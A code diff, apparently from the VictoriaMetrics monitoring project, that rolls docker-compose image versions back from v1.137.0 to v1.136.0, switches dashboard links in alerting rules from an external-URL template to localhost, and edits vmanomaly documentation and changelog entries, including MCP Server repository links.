|
||||
image: victoriametrics/vmalert:v1.137.0
|
||||
image: victoriametrics/vmalert:v1.136.0
|
||||
depends_on:
|
||||
- "vmauth"
|
||||
ports:
|
||||
|
||||
@@ -3,7 +3,7 @@ services:
|
||||
# It scrapes targets defined in --promscrape.config
|
||||
# And forward them to --remoteWrite.url
|
||||
vmagent:
|
||||
image: victoriametrics/vmagent:v1.137.0
|
||||
image: victoriametrics/vmagent:v1.136.0
|
||||
depends_on:
|
||||
- "victoriametrics"
|
||||
ports:
|
||||
@@ -18,7 +18,7 @@ services:
|
||||
# VictoriaMetrics instance, a single process responsible for
|
||||
# storing metrics and serve read requests.
|
||||
victoriametrics:
|
||||
image: victoriametrics/victoria-metrics:v1.137.0
|
||||
image: victoriametrics/victoria-metrics:v1.136.0
|
||||
ports:
|
||||
- 8428:8428
|
||||
- 8089:8089
|
||||
@@ -50,12 +50,11 @@ services:
|
||||
- ./../../dashboards/victoriametrics.json:/var/lib/grafana/dashboards/vm.json
|
||||
- ./../../dashboards/vmagent.json:/var/lib/grafana/dashboards/vmagent.json
|
||||
- ./../../dashboards/vmalert.json:/var/lib/grafana/dashboards/vmalert.json
|
||||
- ./../../dashboards/alert-statistics.json:/var/lib/grafana/dashboards/alert-statistics.json
|
||||
restart: always
|
||||
|
||||
# vmalert executes alerting and recording rules
|
||||
vmalert:
|
||||
image: victoriametrics/vmalert:v1.137.0
|
||||
image: victoriametrics/vmalert:v1.136.0
|
||||
depends_on:
|
||||
- "victoriametrics"
|
||||
- "alertmanager"
|
||||
|
||||
@@ -27,7 +27,7 @@ groups:
|
||||
labels:
|
||||
severity: critical
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/oS7Bi_0Wz?viewPanel=20&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/oS7Bi_0Wz?viewPanel=20&var-instance={{ $labels.instance }}"
|
||||
summary: "Instance {{ $labels.instance }} will run out of disk space in 3 days"
|
||||
description: "Taking into account current ingestion rate, free disk space will be enough only
|
||||
for {{ $value | humanizeDuration }} on instance {{ $labels.instance }}.\n
|
||||
@@ -51,7 +51,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/oS7Bi_0Wz?viewPanel=20&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/oS7Bi_0Wz?viewPanel=20&var-instance={{ $labels.instance }}"
|
||||
summary: "Instance {{ $labels.instance }} will become read-only in 3 days"
|
||||
description: "Taking into account current ingestion rate, free disk space and -storage.minFreeDiskSpaceBytes
|
||||
instance {{ $labels.instance }} will remain writable for {{ $value | humanizeDuration }}.\n
|
||||
@@ -68,7 +68,7 @@ groups:
|
||||
labels:
|
||||
severity: critical
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/oS7Bi_0Wz?viewPanel=20&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/oS7Bi_0Wz?viewPanel=20&var-instance={{ $labels.instance }}"
|
||||
summary: "Instance {{ $labels.instance }} (job={{ $labels.job }}) will run out of disk space soon"
|
||||
description: "Disk utilisation on instance {{ $labels.instance }} is more than 80%.\n
|
||||
Having less than 20% of free disk space could cripple merges processes and overall performance.
|
||||
@@ -81,7 +81,7 @@ groups:
|
||||
severity: warning
|
||||
show_at: dashboard
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/oS7Bi_0Wz?viewPanel=52&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/oS7Bi_0Wz?viewPanel=52&var-instance={{ $labels.instance }}"
|
||||
summary: "Too many errors served for {{ $labels.job }} path {{ $labels.path }} (instance {{ $labels.instance }})"
|
||||
description: "Requests to path {{ $labels.path }} are receiving errors.
|
||||
Please verify if clients are sending correct requests."
|
||||
@@ -100,7 +100,7 @@ groups:
|
||||
severity: warning
|
||||
show_at: dashboard
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/oS7Bi_0Wz?viewPanel=44&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/oS7Bi_0Wz?viewPanel=44&var-instance={{ $labels.instance }}"
|
||||
summary: "Too many RPC errors for {{ $labels.job }} (instance {{ $labels.instance }})"
|
||||
description: "RPC errors are interconnection errors between cluster components.\n
|
||||
Possible reasons for errors are misconfiguration, overload, network blips or unreachable components."
|
||||
@@ -116,7 +116,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/oS7Bi_0Wz?viewPanel=102"
|
||||
dashboard: "http://localhost:3000/d/oS7Bi_0Wz?viewPanel=102"
|
||||
summary: "Churn rate is more than 10% for the last 15m"
|
||||
description: "VM constantly creates new time series.\n
|
||||
This effect is known as Churn Rate.\n
|
||||
@@ -132,7 +132,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/oS7Bi_0Wz?viewPanel=102"
|
||||
dashboard: "http://localhost:3000/d/oS7Bi_0Wz?viewPanel=102"
|
||||
summary: "Too high number of new series created over last 24h"
|
||||
description: "The number of created new time series over last 24h is 3x times higher than
|
||||
current number of active series.\n
|
||||
@@ -151,7 +151,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/oS7Bi_0Wz?viewPanel=108"
|
||||
dashboard: "http://localhost:3000/d/oS7Bi_0Wz?viewPanel=108"
|
||||
summary: "Percentage of slow inserts is more than 5% for the last 15m"
|
||||
description: "High rate of slow inserts may be a sign of resource exhaustion
|
||||
for the current load. It is likely more RAM is needed for optimal handling of the current number of active time series.
|
||||
@@ -164,7 +164,7 @@ groups:
|
||||
severity: warning
|
||||
show_at: dashboard
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/oS7Bi_0Wz?viewPanel=139&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/oS7Bi_0Wz?viewPanel=139&var-instance={{ $labels.instance }}"
|
||||
summary: "Connection between vminsert on {{ $labels.instance }} and vmstorage on {{ $labels.addr }} is saturated"
|
||||
description: "The connection between vminsert (instance {{ $labels.instance }}) and vmstorage (instance {{ $labels.addr }})
|
||||
is saturated by more than 90% and vminsert won't be able to keep up.\n
|
||||
|
||||
@@ -15,7 +15,7 @@ groups:
|
||||
labels:
|
||||
severity: critical
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/G7Z9GzMGz?viewPanel=49&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/G7Z9GzMGz?viewPanel=49&var-instance={{ $labels.instance }}"
|
||||
summary: "Instance {{ $labels.instance }} is dropping data from persistent queue"
|
||||
description: "Vmagent dropped {{ $value | humanize1024 }} from persistent queue
|
||||
on instance {{ $labels.instance }} for the last 10m."
|
||||
@@ -26,7 +26,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/G7Z9GzMGz?viewPanel=79&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/G7Z9GzMGz?viewPanel=79&var-instance={{ $labels.instance }}"
|
||||
summary: "Vmagent is dropping data blocks that are rejected by remote storage"
|
||||
description: "Job \"{{ $labels.job }}\" on instance {{ $labels.instance }} drops the rejected by
|
||||
remote-write server data blocks. Check the logs to find the reason for rejects."
|
||||
@@ -37,7 +37,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/G7Z9GzMGz?viewPanel=31&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/G7Z9GzMGz?viewPanel=31&var-instance={{ $labels.instance }}"
|
||||
summary: "Vmagent fails to scrape one or more targets"
|
||||
description: "Job \"{{ $labels.job }}\" on instance {{ $labels.instance }} fails to scrape targets for last 15m"
|
||||
|
||||
@@ -61,7 +61,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/G7Z9GzMGz?viewPanel=77&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/G7Z9GzMGz?viewPanel=77&var-instance={{ $labels.instance }}"
|
||||
summary: "Vmagent responds with too many errors on data ingestion protocols"
|
||||
description: "Job \"{{ $labels.job }}\" on instance {{ $labels.instance }} responds with errors to write requests for last 15m."
|
||||
|
||||
@@ -71,7 +71,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/G7Z9GzMGz?viewPanel=61&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/G7Z9GzMGz?viewPanel=61&var-instance={{ $labels.instance }}"
|
||||
summary: "Job \"{{ $labels.job }}\" on instance {{ $labels.instance }} fails to push to remote storage"
|
||||
description: "Vmagent fails to push data via remote write protocol to destination \"{{ $labels.url }}\"\n
|
||||
Ensure that destination is up and reachable."
|
||||
@@ -87,7 +87,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/G7Z9GzMGz?viewPanel=84&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/G7Z9GzMGz?viewPanel=84&var-instance={{ $labels.instance }}"
|
||||
summary: "Remote write connection from \"{{ $labels.job }}\" (instance {{ $labels.instance }}) to {{ $labels.url }} is saturated"
|
||||
description: "The remote write connection between vmagent \"{{ $labels.job }}\" (instance {{ $labels.instance }}) and destination \"{{ $labels.url }}\"
|
||||
is saturated by more than 90% and vmagent won't be able to keep up.\n
|
||||
@@ -101,7 +101,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/G7Z9GzMGz?viewPanel=98&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/G7Z9GzMGz?viewPanel=98&var-instance={{ $labels.instance }}"
|
||||
summary: "Persistent queue writes for instance {{ $labels.instance }} are saturated"
|
||||
description: "Persistent queue writes for vmagent \"{{ $labels.job }}\" (instance {{ $labels.instance }})
|
||||
are saturated by more than 90% and vmagent won't be able to keep up with flushing data on disk.
|
||||
@@ -113,7 +113,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/G7Z9GzMGz?viewPanel=99&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/G7Z9GzMGz?viewPanel=99&var-instance={{ $labels.instance }}"
|
||||
summary: "Persistent queue reads for instance {{ $labels.instance }} are saturated"
|
||||
description: "Persistent queue reads for vmagent \"{{ $labels.job }}\" (instance {{ $labels.instance }})
|
||||
are saturated by more than 90% and vmagent won't be able to keep up with reading data from the disk.
|
||||
@@ -124,7 +124,7 @@ groups:
|
||||
labels:
|
||||
severity: critical
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/G7Z9GzMGz?viewPanel=88&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/G7Z9GzMGz?viewPanel=88&var-instance={{ $labels.instance }}"
|
||||
summary: "Instance {{ $labels.instance }} reached 90% of the limit"
|
||||
description: "Max series limit set via -remoteWrite.maxHourlySeries flag is close to reaching the max value.
|
||||
Then samples for new time series will be dropped instead of sending them to remote storage systems."
|
||||
@@ -134,7 +134,7 @@ groups:
|
||||
labels:
|
||||
severity: critical
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/G7Z9GzMGz?viewPanel=90&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/G7Z9GzMGz?viewPanel=90&var-instance={{ $labels.instance }}"
|
||||
summary: "Instance {{ $labels.instance }} reached 90% of the limit"
|
||||
description: "Max series limit set via -remoteWrite.maxDailySeries flag is close to reaching the max value.
|
||||
Then samples for new time series will be dropped instead of sending them to remote storage systems."
|
||||
|
||||
@@ -23,7 +23,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/LzldHAVnz?viewPanel=13&var-instance={{ $labels.instance }}&var-file={{ $labels.file }}&var-group={{ $labels.group }}"
|
||||
dashboard: "http://localhost:3000/d/LzldHAVnz?viewPanel=13&var-instance={{ $labels.instance }}&var-file={{ $labels.file }}&var-group={{ $labels.group }}"
|
||||
summary: "Alerting rules are failing for vmalert instance {{ $labels.instance }}"
|
||||
description: "Alerting rules execution is failing for \"{{ $labels.alertname }}\" from group \"{{ $labels.group }}\" in file \"{{ $labels.file }}\".
|
||||
Check vmalert's logs for detailed error message."
|
||||
@@ -34,7 +34,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/LzldHAVnz?viewPanel=30&var-instance={{ $labels.instance }}&var-file={{ $labels.file }}&var-group={{ $labels.group }}"
|
||||
dashboard: "http://localhost:3000/d/LzldHAVnz?viewPanel=30&var-instance={{ $labels.instance }}&var-file={{ $labels.file }}&var-group={{ $labels.group }}"
|
||||
summary: "Recording rules are failing for vmalert instance {{ $labels.instance }}"
|
||||
description: "Recording rules execution is failing for \"{{ $labels.recording }}\" from group \"{{ $labels.group }}\" in file \"{{ $labels.file }}\".
|
||||
Check vmalert's logs for detailed error message."
|
||||
@@ -45,7 +45,7 @@ groups:
|
||||
labels:
|
||||
severity: info
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/LzldHAVnz?viewPanel=33&var-file={{ $labels.file }}&var-group={{ $labels.group }}"
|
||||
dashboard: "http://localhost:3000/d/LzldHAVnz?viewPanel=33&var-file={{ $labels.file }}&var-group={{ $labels.group }}"
|
||||
summary: "Recording rule {{ $labels.recording }} ({{ $labels.group }}) produces no data"
|
||||
description: "Recording rule \"{{ $labels.recording }}\" from group \"{{ $labels.group }}\ in file \"{{ $labels.file }}\"
|
||||
produces 0 samples over the last 30min. It might be caused by a misconfiguration
|
||||
|
||||
@@ -11,7 +11,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/nbuo5Mr4k?viewPanel=10&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/nbuo5Mr4k?viewPanel=10&var-instance={{ $labels.instance }}"
|
||||
summary: "vmauth ({{ $labels.instance }}) reached concurrent requests limit"
|
||||
description: "Possible solutions: increase -maxQueueDuration flag value, increase -maxConcurrentRequests flag value,
|
||||
deploy additional vmauth replicas, check requests latency at backend service.
|
||||
@@ -22,7 +22,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/nbuo5Mr4k?viewPanel=10&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/nbuo5Mr4k?viewPanel=10&var-instance={{ $labels.instance }}"
|
||||
summary: "vmauth ({{ $labels.instance }}) has reached concurrent requests limit for username {{ $labels.username }}"
|
||||
description: "Possible solutions: increase -maxQueueDuration flag value, increase -maxConcurrentPerUserRequests flag value,
|
||||
deploy additional vmauth replicas, check requests latency at backend service."
|
||||
@@ -32,7 +32,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/nbuo5Mr4k?viewPanel=10&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/nbuo5Mr4k?viewPanel=10&var-instance={{ $labels.instance }}"
|
||||
summary: "vmauth ({{ $labels.instance }}) has reached concurrent requests limit for unauthorized user"
|
||||
description: "Possible solutions: increase -maxQueueDuration flag value, increase -maxConcurrentPerUserRequests flag value,
|
||||
deploy additional vmauth replicas, check requests latency at backend service."
|
||||
@@ -42,7 +42,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/nbuo5Mr4k?viewPanel=37&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/nbuo5Mr4k?viewPanel=37&var-instance={{ $labels.instance }}"
|
||||
summary: "Too many errors served for unauthorized user (instance {{ $labels.instance }})"
|
||||
description: "Requests from unauthorized user are receiving errors.
|
||||
Please check the vmauth logs to verify that the configuration is correct and clients are sending valid requests."
|
||||
@@ -52,7 +52,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/nbuo5Mr4k?viewPanel=37&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/nbuo5Mr4k?viewPanel=37&var-instance={{ $labels.instance }}"
|
||||
summary: "Too many errors served for user {{ $labels.username }} (instance {{ $labels.instance }})"
|
||||
description: "Requests from user {{ $labels.username }} are receiving errors.
|
||||
Please check the vmauth logs to verify that the configuration is correct and clients are sending valid requests."
|
||||
|
||||
@@ -27,7 +27,7 @@ groups:
|
||||
labels:
|
||||
severity: critical
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/wNf0q_kZk?viewPanel=53&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/wNf0q_kZk?viewPanel=53&var-instance={{ $labels.instance }}"
|
||||
summary: "Instance {{ $labels.instance }} will run out of disk space soon"
|
||||
description: "Taking into account current ingestion rate, free disk space will be enough only
|
||||
for {{ $value | humanizeDuration }} on instance {{ $labels.instance }}.\n
|
||||
@@ -51,7 +51,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/oS7Bi_0Wz?viewPanel=53&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/oS7Bi_0Wz?viewPanel=53&var-instance={{ $labels.instance }}"
|
||||
summary: "Instance {{ $labels.instance }} will become read-only in 3 days"
|
||||
description: "Taking into account current ingestion rate and free disk space
|
||||
instance {{ $labels.instance }} is writable for {{ $value | humanizeDuration }}.\n
|
||||
@@ -68,7 +68,7 @@ groups:
|
||||
labels:
|
||||
severity: critical
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/wNf0q_kZk?viewPanel=53&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/wNf0q_kZk?viewPanel=53&var-instance={{ $labels.instance }}"
|
||||
summary: "Instance {{ $labels.instance }} (job={{ $labels.job }}) will run out of disk space soon"
|
||||
description: "Disk utilisation on instance {{ $labels.instance }} is more than 80%.\n
|
||||
Having less than 20% of free disk space could cripple merge processes and overall performance.
|
||||
@@ -80,7 +80,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/wNf0q_kZk?viewPanel=35&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/wNf0q_kZk?viewPanel=35&var-instance={{ $labels.instance }}"
|
||||
summary: "Too many errors served for path {{ $labels.path }} (instance {{ $labels.instance }})"
|
||||
description: "Requests to path {{ $labels.path }} are receiving errors.
|
||||
Please verify if clients are sending correct requests."
|
||||
@@ -96,7 +96,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/wNf0q_kZk?viewPanel=66&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/wNf0q_kZk?viewPanel=66&var-instance={{ $labels.instance }}"
|
||||
summary: "Churn rate is more than 10% on \"{{ $labels.instance }}\" for the last 15m"
|
||||
description: "VM constantly creates new time series on \"{{ $labels.instance }}\".\n
|
||||
This effect is known as Churn Rate.\n
|
||||
@@ -112,7 +112,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/wNf0q_kZk?viewPanel=66&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/wNf0q_kZk?viewPanel=66&var-instance={{ $labels.instance }}"
|
||||
summary: "Too high number of new series on \"{{ $labels.instance }}\" created over last 24h"
|
||||
description: "The number of created new time series over last 24h is 3x times higher than
|
||||
current number of active series on \"{{ $labels.instance }}\".\n
|
||||
@@ -131,7 +131,7 @@ groups:
|
||||
labels:
|
||||
severity: warning
|
||||
annotations:
|
||||
dashboard: "{{ $externalURL }}/d/wNf0q_kZk?viewPanel=68&var-instance={{ $labels.instance }}"
|
||||
dashboard: "http://localhost:3000/d/wNf0q_kZk?viewPanel=68&var-instance={{ $labels.instance }}"
|
||||
summary: "Percentage of slow inserts is more than 5% on \"{{ $labels.instance }}\" for the last 15m"
|
||||
description: "High rate of slow inserts on \"{{ $labels.instance }}\" may be a sign of resource exhaustion
|
||||
for the current load. It is likely more RAM is needed for optimal handling of the current number of active time series.
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
services:
|
||||
vmagent:
|
||||
image: victoriametrics/vmagent:v1.137.0
|
||||
image: victoriametrics/vmagent:v1.136.0
|
||||
depends_on:
|
||||
- "victoriametrics"
|
||||
ports:
|
||||
@@ -14,7 +14,7 @@ services:
|
||||
restart: always
|
||||
|
||||
victoriametrics:
|
||||
image: victoriametrics/victoria-metrics:v1.137.0
|
||||
image: victoriametrics/victoria-metrics:v1.136.0
|
||||
ports:
|
||||
- 8428:8428
|
||||
volumes:
|
||||
@@ -40,7 +40,7 @@ services:
|
||||
restart: always
|
||||
|
||||
vmalert:
|
||||
image: victoriametrics/vmalert:v1.137.0
|
||||
image: victoriametrics/vmalert:v1.136.0
|
||||
depends_on:
|
||||
- "victoriametrics"
|
||||
ports:
|
||||
@@ -59,7 +59,7 @@ services:
|
||||
- '--external.alert.source=explore?orgId=1&left=["now-1h","now","VictoriaMetrics",{"expr": },{"mode":"Metrics"},{"ui":[true,true,true,"none"]}]'
|
||||
restart: always
|
||||
vmanomaly:
|
||||
image: victoriametrics/vmanomaly:v1.29.0
|
||||
image: victoriametrics/vmanomaly:v1.28.7
|
||||
depends_on:
|
||||
- "victoriametrics"
|
||||
ports:
|
||||
|
||||
@@ -14,21 +14,6 @@ aliases:
|
||||
---
|
||||
Please find the changelog for VictoriaMetrics Anomaly Detection below.
|
||||
|
||||
## v1.29.0
|
||||
Released: 2026-03-05
|
||||
|
||||
- UI: Updated [vmanomaly UI](https://docs.victoriametrics.com/anomaly-detection/ui/) from [v1.4.3](https://docs.victoriametrics.com/anomaly-detection/ui/#v143) to [v1.5.0](https://docs.victoriametrics.com/anomaly-detection/ui/#v150), see respective [release notes](https://docs.victoriametrics.com/anomaly-detection/ui/#v150) for details. Notable changes include [AI assistance](https://docs.victoriametrics.com/anomaly-detection/ui/#ai-assistance) support capable of applying model configuration changes, generating VMAlert rules, and providing general guidance on using the product.
|
||||
|
||||
- IMPROVEMENT: Optimized internal data structures for readers when `query_from_last_seen_timestamp` [parameter](https://docs.victoriametrics.com/anomaly-detection/components/reader/#config-parameters) is enabled, resulting in reduced memory usage and improved performance for large datasets.
|
||||
|
||||
- IMPROVEMENT: Hardened [hot reload](https://docs.victoriametrics.com/anomaly-detection/components/#hot-reload) with staged snapshot apply and automatic rollback. Reload now validates once and applies the same snapshot, preventing re-read race conditions and avoiding same-port conflicts during restart; failures keep previous runtime and are reflected in [startup metrics](https://docs.victoriametrics.com/anomaly-detection/components/monitoring/#startup-metrics).
|
||||
|
||||
- BUGFIX: Config file read/parse failures are now non-fatal in [hot reload](https://docs.victoriametrics.com/anomaly-detection/components/#hot-reload) mode (service keeps running), while initial startup remains fatal for invalid/broken config files.
|
||||
|
||||
- BUGFIX: Fixed missing datapoints in [BacktestingScheduler](https://docs.victoriametrics.com/anomaly-detection/components/scheduler/#backtesting-scheduler) windows used in [exact mode](https://docs.victoriametrics.com/anomaly-detection/components/scheduler/#defining-inference-timeframe-1), leading to "gaps" in plotted predictions and scores.
|
||||
|
||||
- BUGFIX: Fixed a model state update issue in [BacktestingScheduler exact mode](https://docs.victoriametrics.com/anomaly-detection/components/scheduler/#defining-inference-timeframe-1) when parallelization (`settings.n_workers > 1`) was enabled, causing [online models](https://docs.victoriametrics.com/anomaly-detection/components/models/#online-models) to produce stale/flat `yhat`, `yhat_lower`, and `yhat_upper` lines.
|
||||
|
||||
## v1.28.7
|
||||
Released: 2026-02-09
|
||||
|
||||
@@ -58,7 +43,7 @@ Released: 2026-01-12
|
||||
## v1.28.3
|
||||
Released: 2025-12-17
|
||||
|
||||
- IMPROVEMENT: Aligned service endpoints for `vmanomaly` [MCP Server](https://github.com/VictoriaMetrics/mcp-vmanomaly) integration.
|
||||
- IMPROVEMENT: Aligned service endpoints for `vmanomaly` [MCP Server](https://github.com/VictoriaMetrics-Community/mcp-vmanomaly) integration.
|
||||
|
||||
## v1.28.2
|
||||
Released: 2025-12-11
|
||||
|
||||
@@ -139,7 +139,7 @@ For information on migrating between different versions of `vmanomaly`, please r
|
||||
|
||||
## Choosing the right model for vmanomaly
|
||||
|
||||
> {{% available_from "v1.28.3" anomaly %}} Try our [MCP Server](https://github.com/VictoriaMetrics/mcp-vmanomaly) to get AI-assisted recommendations on selecting the best model and its configuration for your use case. See [installation guide](https://github.com/VictoriaMetrics/mcp-vmanomaly#installation) for more details.
|
||||
> {{% available_from "v1.28.3" anomaly %}} Try our [MCP Server](https://github.com/VictoriaMetrics-Community/mcp-vmanomaly) to get AI-assisted recommendations on selecting the best model and its configuration for your use case. See [installation guide](https://github.com/VictoriaMetrics-Community/mcp-vmanomaly#installation) for more details.
|
||||
|
||||
Selecting the best model for `vmanomaly` depends on the data's nature and the [types of anomalies](https://victoriametrics.com/blog/victoriametrics-anomaly-detection-handbook-chapter-2/#categories-of-anomalies) to detect. For instance, [Z-score](https://docs.victoriametrics.com/anomaly-detection/components/models/#online-z-score) is suitable for data without trends or seasonality, while more complex patterns might require models like [Prophet](https://docs.victoriametrics.com/anomaly-detection/components/models/#prophet).
|
||||
|
||||
@@ -151,8 +151,7 @@ Still not 100% sure what to use? We are [here to help](https://docs.victoriametr
|
||||
|
||||
## Incorporating domain knowledge
|
||||
|
||||
> [!TIP]
|
||||
> {{% available_from "v1.28.3" anomaly %}} Try our [MCP Server](https://github.com/VictoriaMetrics/mcp-vmanomaly) to get AI-assisted recommendations on incorporating domain knowledge into your anomaly detection models. See [installation guide](https://github.com/VictoriaMetrics/mcp-vmanomaly#installation) for more details. {{% available_from "v1.29.0" anomaly %}} Connect MCP server to the [vmanomaly UI](https://docs.victoriametrics.com/anomaly-detection/ui/) to benefit from better response quality and tool access in the UI Copilot, which provides AI-assisted configuration generation and debugging capabilities. See the [UI documentation](https://docs.victoriametrics.com/anomaly-detection/ui/#ai-assistance) for instructions on how to set it up.
|
||||
> {{% available_from "v1.28.3" anomaly %}} Try our [MCP Server](https://github.com/VictoriaMetrics-Community/mcp-vmanomaly) to get AI-assisted recommendations on incorporating domain knowledge into your anomaly detection models. See [installation guide](https://github.com/VictoriaMetrics-Community/mcp-vmanomaly#installation) for more details.
|
||||
|
||||
Anomaly detection models can significantly improve when incorporating business-specific assumptions about the data and what constitutes an anomaly. `vmanomaly` supports various [business-side configuration parameters](https://docs.victoriametrics.com/anomaly-detection/components/models/#common-args) across all built-in models to **reduce [false positives](https://victoriametrics.com/blog/victoriametrics-anomaly-detection-handbook-chapter-1/#false-positive)** and **align model behavior with business needs**, for example:
|
||||
|
||||
@@ -237,7 +236,7 @@ groups:
|
||||
|
||||
> {{% available_from "v1.27.0" anomaly %}} You can also use the [vmanomaly UI](https://docs.victoriametrics.com/anomaly-detection/ui/) to generate alerting rules automatically based on your model configurations and selected thresholds.
|
||||
|
||||
> {{% available_from "v1.28.3" anomaly %}} Check out our [MCP Server](https://github.com/VictoriaMetrics/mcp-vmanomaly) to get AI-assisted recommendations on setting up alerting rules based on produced anomaly scores. See [installation guide](https://github.com/VictoriaMetrics/mcp-vmanomaly#installation) for more details.
|
||||
> {{% available_from "v1.28.3" anomaly %}} Check out our [MCP Server](https://github.com/VictoriaMetrics-Community/mcp-vmanomaly) to get AI-assisted recommendations on setting up alerting rules based on produced anomaly scores. See [installation guide](https://github.com/VictoriaMetrics-Community/mcp-vmanomaly#installation) for more details.
|
||||
|
||||
## Preventing alert fatigue
|
||||
Produced anomaly scores are designed in such a way that values from 0.0 to 1.0 indicate non-anomalous data, while a value greater than 1.0 is generally classified as an anomaly. However, there are no perfect models for anomaly detection, that's why reasonable defaults expressions like `anomaly_score > 1` may not work 100% of the time. However, anomaly scores, produced by `vmanomaly` are written back as metrics to VictoriaMetrics, where tools like [`vmalert`](https://docs.victoriametrics.com/victoriametrics/vmalert/) can use [MetricsQL](https://docs.victoriametrics.com/victoriametrics/metricsql/) expressions to fine-tune alerting thresholds and conditions, balancing between avoiding [false negatives](https://victoriametrics.com/blog/victoriametrics-anomaly-detection-handbook-chapter-1/#false-negative) and reducing [false positives](https://victoriametrics.com/blog/victoriametrics-anomaly-detection-handbook-chapter-1/#false-positive).
|
||||
@@ -420,7 +419,7 @@ services:
|
||||
# ...
|
||||
vmanomaly:
|
||||
container_name: vmanomaly
|
||||
image: victoriametrics/vmanomaly:v1.29.0
|
||||
image: victoriametrics/vmanomaly:v1.28.7
|
||||
# ...
|
||||
restart: always
|
||||
volumes:
|
||||
@@ -638,7 +637,7 @@ options:
|
||||
Here’s an example of using the config splitter to divide configurations based on the `extra_filters` argument from the reader section:
|
||||
|
||||
```sh
|
||||
docker pull victoriametrics/vmanomaly:v1.29.0 && docker image tag victoriametrics/vmanomaly:v1.29.0 vmanomaly
|
||||
